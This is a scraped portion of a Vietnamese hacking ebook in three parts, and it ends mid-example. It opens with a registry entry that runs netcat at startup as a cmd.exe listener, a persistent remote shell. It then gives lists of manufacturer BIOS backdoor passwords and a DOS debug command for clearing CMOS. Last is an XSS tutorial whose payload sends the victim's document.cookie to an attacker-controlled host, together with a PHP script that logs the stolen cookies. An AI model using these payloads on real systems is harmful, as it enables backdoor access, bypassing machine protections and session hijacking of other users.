Tải bản đầy đủ (.pdf) (6 trang)

Hacker Professional Ebook part 30 ppsx

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (132.46 KB, 6 trang )



CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"
nhoccon1412(VNISS)
Các kiến thức hacking cơ bản và cổ điển (bài 2)

Tổng hợp Bypass / Crack BIOS Password

Trước khi bạn cố gắng bypass hay crack BIOS bạn nên liên hệ với nhà sản xuất
phần cứng mà bạn đang sử dụng (MainBoard) để nhận được sự hỗ trợ từ họ và
đừng quên hỏi họ làm thế nào để bypass BIOS security. Trong một số trường hợp
họ không thể giúp bạn, nhưng ở đây là 1 số phương pháp có thể giúp bạn bypass
hay reset password của BIOS:
• Backdoor Passwords
• Sử dụng phần mềm Cracking Password BIOS
• Reset password bằng cách dùng jumpers hay solder beads.
• Lấy Pin CMOS ra ngoài ít nhất 10 phút
• Một số cách khác
• Sử dụng những dịch vụ chuyên nghiệp
Backdoor Passwords
Nhiều nhà sản xuất phần cứng đã cung cấp những mật khẩu Backdoor để giúp bạn
tuy cập đến BIOS setup trong trường hợp bạn quên mất mật khẩu của mình.
Chú ý: Một vài BIOS đã thiết lập để khoá hệ thống của bạn nếu bạn đánh password
sai trên 3 lần. Vì thế bạn nên đọc tài liệu của nhà sản xuất trước khi bắt đầu đánh
password.
Award BIOS backdoor passwords:


ALFAROME ALLy aLLy aLLY ALLY aPAf _award
BIOSTAR CONCAT CONDO Condo d8on djonet HLT
KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX
ZAAADA ZBAAACAZJAAADC01322222 589589 589721 595595
AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward
J64 J256 J262 j332 j322
SYXZ syxz shift + syxz TTPTHA
598598
AMI BIOS backdoor passwords:
AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW
LKWPETER A.M.I. CONDO
PHOENIX BIOS backdoor passwords:
phoenix, PHOENIX, CMOS, BIOS
MISC. COMMON PASSWORDS
ALFAROME BIOSTAR biostar biosstar CMOS cmos
LKWPETER lkwpeter setup SETUP Syxz Wodj
OTHER BIOS PASSWORDS BY MANUFACTURER
Manufacturer
Password
VOBIS & IBM
merlin
Dell
Dell
Biostar
Biostar
Compaq
Compaq
Enox
xo11nE
Epox

central
Freetech
Posterie
IWill
iwill
Jetway
spooml
Packard Bell
bell9
QDI
QDI
Siemens
SKY_FOX
TMC
BIGO
Toshiba
Toshiba
TOSHIBA BIOS
Một số sản phẩm laptop và desktop của Toshiba sẽ cho phép bạn bypass BIOS
Password nếu bạn giữ phím Shift trong suốt qúa trình boot.
IBM APTIVA BIOS
Click cả chuột phải và trái liên tục trong suốt quá trình
Nếu tất cả đều không được bạn có thể sử dụng default passords list: :

Ngoài ra, nếu bạn muốn vô hiệu hóa mật khẩu đã cài trong BIOS (để không ai có
thể thay đổi phần cấu hình trong BIOS), bạn có thể gõ lệnh debug sau khi vào được
trong DOS: C:\>debug -O 70 2f -O 71 ff -Q
Sử dụng phần mềm Cracking Password BIOS
Dưới đây là 1 số phần mềm dùng để bypass BIOS, chúng có thể được xem là nguy
hiểm hoặc là có ích tuỳ theo mức độ. Tuy nhiên tôi khuyên bạn hãy thận trọng khi

dùng nó.



Reset password bằng cách dùng jumpers hay solder beads.
Tắt máy tính, gạt jumper tới vị trí tiếp xúc với mảnh kim loại (có thể bạn sẽ phải
cầm tay giữ jumper khi đẩy chúng tiếp xúc với mảnh kim loại). Nhấn nguồn để bật
máy tính, khi đó hệ thống của bạn sẽ không thể khởi động được theo cách này
nhưng CMOS lại bị xoá hết. Tiếp sau đó, bạn đặt đặt jumper về vị trí mặc định và
khởi động lại máy tính bình thường. Trong hầu hết trường hợp, máy tính của bạn
sẽ dừng ngay tại màn hình POST và yêu cầu bạn nhấn F1 hoặc một từ khoá nào đó
để định lại BIOS về dạng mặc định. Để thực hiện được điều này, từ màn hình
BIOS, bạn chỉ cần lưu (save) và thoát (exit) để vào máy tính một cách bình thường,
khi đó mật khẩu BIOS đã bị xoá bỏ hoàn toàn.
Sau khi đã xóa được RAM CMOS, bạn khởi động máy lại, vào trình Setup để cấu
hình lại các thông số đúng cho BIOS. Nếu bạn quên các thông số này, bạn có thể
dùng chức năng "Load BIOS default".
Lấy Pin CMOS ra ngoài ít nhất 10 phút
Bằng cách gỡ pin nuôi CMOS ra khỏi mainboard rồi gắn lại. Tuy nhiên tùy theo
loại pin mà có thể sẽ phải dùng mỏ hàn và đòi hỏi phải biết về kỷ thuật hàn mạch
điện tử.
Một số cách khác
* Bằng cách gỡ chip RAM CMOS ra khỏi mainboard 1 thời gian (để các tụ lọc
phóng hết điện) rồi gắn lại nếu chip này được gắn trên một đế.
* Bằng cách chập mạch các transistor và RAM CMOS trên mainboard (cách nầy
không nên làm nếu không biết về điện tử).
Sử dụng những dịch vụ chuyên nghiệp
Bằng cách gọi 911 hehe, í mà ở Việt Nam cũng có 911 mà, các bạn có thể vào đây
để yêu cầu giúp đỡ nhanh chóng nhớ nhé, đừng có gọi lộn 113 thì toi . Good Luck


nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 3)


XSS căn bản

Copyright by HCVTeam.net huythanhv2
Ngày nay, trên Internet ko khó để thấy các bug mới về XSS. huythanh thấy ngứa
tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này. Vì mới tìm hiểu
nên bài này hợp với newbie hơn . Ai copy nhớ cái copyright hộ nhá
** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA . Hix nhớ
bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may
là in ra 1 bản rồi . Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của
mask, hix có mấy chỗ mò cả ngày mới ra . Anyway, cho gởi lời cảm ơn đặc biệt
đến Mask
Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm
CSS : Cascading Style Sheets
XSS : Cross-Site Scripting

*** Dấu hiệu nhận biết site mắc lỗi :
Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các
exploit thường dựa trên cái này
Vd : xss vào đây]
Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác
là siêu sao

*** Cách chèn script :
Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã
Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được )

Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá

CODE
javascript:alert(document.cookie)


Thấy gì nào ? Nó sẽ ra có dạng thế này

CODE
acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;};
session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1;
pass_hash=c561a5a3859a0df75f76d98ae67bc026


[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]

Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó
vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với
tên 1 biến là document.cookie

Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong

CODE
javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)


Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó
document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất.
Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit.


*** Cách exploit :
Đầu tiên tạo file cookie.php thế này up lên host của bạn

CODE
<?
/*XSS Exploit */
/*PHP Cookie Saver */
/*Copyright by huythanhv2, HCVTEAM.NET */
$f=fopen("xss.txt","a");
$cook=$HTTP_GET_VARS["cookie"];
fputs($f,$cook.chr(13));
fclose($f);
header("location: O");
?>


XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này

CODE

×